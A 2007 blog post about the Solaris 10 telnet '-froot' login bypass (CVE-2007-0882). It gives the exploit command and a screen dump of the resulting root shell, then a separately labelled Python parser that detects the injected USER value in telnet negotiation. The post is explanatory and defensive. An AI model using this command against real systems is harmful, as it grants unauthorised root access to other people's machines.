Tuesday, May 1, 2007

Inbuilt vulnerability support!

I have been thinking about starting a technical blog for quite some time. And I am excited to start with writing about security. From the early days at college, I was told that getting root / administrator is the biggest thing a computer engineer can do, and some of my friends were successful enough to crack a Novell NetWare network and use it for getting some pr0n. Finally one hell of an anti-cracker caught them, 'disassembled and analysed' the whole .EXE file they used to crack the Novell NetWare and suspended them from the lab. (The anti-cracker had used a tool called Turbo Disassembler to do the magic.) Now please don't ask me how he managed to do that. I have been trying to figure that out for years, and once I understand how to do that, I will go to the Himalayas and spend the rest of my life as a sadhu! (some snaps) And then there was another guy who told me that copying and pasting the GNU/Linux boot messages to some file will solve all the X related issues in RedHat 7.0. (LOL! I hope he will be reading this.)

Ok :-) That's an old story about getting root.

Recently I happened to check a Solaris 10 box. This version of the operating system comes with an interesting zero-day bug.

Try "telnet -l '-froot' IP" and you can log in to a Solaris 10 box without a password!

I know, no one is going to believe this, so I have added the screen dump below:

[~]$telnet -l '-froot' IP
Trying IP...
Connected to IP(IP).
Escape character is '^]'.
Last login: Wed Apr 19 00:28:17 from IP
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
# bash

Ok, let's try a cat /etc/release

bash-3.00# cat /etc/re
reboot release remote
bash-3.00# cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006

Still not convinced?

bash-3.00# id
uid=0(root) gid=0(root)
bash-3.00#

Oh yea!!! You can log in without the root password!

btw, what is this '-f' option?

The GNU/Linux telnet man page says: "If Kerberos V5 authentication is being used, the -f option allows the local credentials to be forwarded to the remote system."

Details: CVE-2007-0882 (the telnet "-froot" bug)
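The client's -l user name reaches the server inside the telnet NEW-ENVIRON option (RFC 1572) as the USER variable, and the Solaris bug was that in.telnetd handed that value to login(1) unsanitised, so a value beginning with "-" was read as a login option. The following parser is an added example written for this post (it is not Sun's code and not part of the original post): it decodes a NEW-ENVIRON suboption from captured telnet negotiation bytes and flags a USER value that would be parsed as an option, which is the shape a network sensor or telnetd wrapper would look for. The sample byte strings SUSPICIOUS and BENIGN are constructed here, not real captures.

```python
# Added example, not from the original post: parse the telnet NEW-ENVIRON
# suboption (RFC 1572) and flag user names that begin with "-", the
# argument-injection shape behind CVE-2007-0882.

IAC = 0xFF                  # telnet "interpret as command"
SB = 0xFA                   # suboption begin
SE = 0xF0                   # suboption end
TELOPT_NEW_ENVIRON = 0x27   # option 39
IS, SEND, INFO = 0, 1, 2    # NEW-ENVIRON sub-commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3   # NEW-ENVIRON type codes


def parse_new_environ(data: bytes) -> dict:
    """Decode one 'IAC SB NEW-ENVIRON IS|INFO ... IAC SE' into {name: value}.

    A variable sent without a VALUE maps to None. ESC-escaped bytes and
    doubled IAC bytes inside the body are unescaped. Raises ValueError on
    anything that is not a well-formed NEW-ENVIRON suboption.
    """
    if (len(data) < 5 or data[0] != IAC or data[1] != SB
            or data[2] != TELOPT_NEW_ENVIRON):
        raise ValueError("not a NEW-ENVIRON suboption")
    if data[-2:] != bytes([IAC, SE]):
        raise ValueError("missing IAC SE terminator")
    body = data[3:-2]
    if not body or body[0] not in (IS, INFO):
        raise ValueError("expected IS or INFO sub-command")

    # Pass 1: split the body into (type, raw bytes) tokens.
    tokens = []
    i = 1
    while i < len(body):
        t = body[i]
        if t not in (VAR, VALUE, USERVAR):
            raise ValueError(f"unexpected byte {t:#x} at offset {i}")
        i += 1
        chunk = bytearray()
        while i < len(body) and body[i] not in (VAR, VALUE, USERVAR):
            if body[i] in (ESC, IAC):      # escaped literal / doubled IAC
                i += 1
                if i >= len(body):
                    raise ValueError("dangling escape byte")
            chunk.append(body[i])
            i += 1
        tokens.append((t, bytes(chunk)))

    # Pass 2: pair each VAR/USERVAR name with the VALUE that follows it.
    env = {}
    k = 0
    while k < len(tokens):
        t, name = tokens[k]
        if t == VALUE:
            raise ValueError("VALUE without a preceding variable name")
        k += 1
        value = None
        if k < len(tokens) and tokens[k][0] == VALUE:
            value = tokens[k][1].decode("ascii", "replace")
            k += 1
        env[name.decode("ascii", "replace")] = value
    return env


def user_is_argument_injection(env: dict) -> bool:
    """True when USER would be interpreted as an option by login(1)."""
    user = env.get("USER")
    return bool(user) and user.startswith("-")


def _suboption(*parts: bytes) -> bytes:
    """Helper to build a constructed NEW-ENVIRON IS suboption for testing."""
    return bytes([IAC, SB, TELOPT_NEW_ENVIRON, IS]) + b"".join(parts) + bytes([IAC, SE])


# Constructed sample negotiations (not real captures).
SUSPICIOUS = _suboption(bytes([VAR]), b"USER", bytes([VALUE]), b"-froot")
BENIGN = _suboption(bytes([VAR]), b"USER", bytes([VALUE]), b"alice",
                    bytes([VAR]), b"DISPLAY", bytes([VALUE]), b"host:0")

if __name__ == "__main__":
    for label, pkt in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        env = parse_new_environ(pkt)
        verdict = "ALERT" if user_is_argument_injection(env) else "ok"
        print(f"{label}: {env} -> {verdict}")
```

The check is deliberately on the decoded value rather than on the raw bytes, so an ESC-escaped or split "-f" still gets caught; a telnet proxy or inetd wrapper that rejects such a USER before exec'ing login gives the same protection as the vendor patch while the patch is being rolled out.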

The Register has an article here

Sun has announced a workaround and a patch for it.
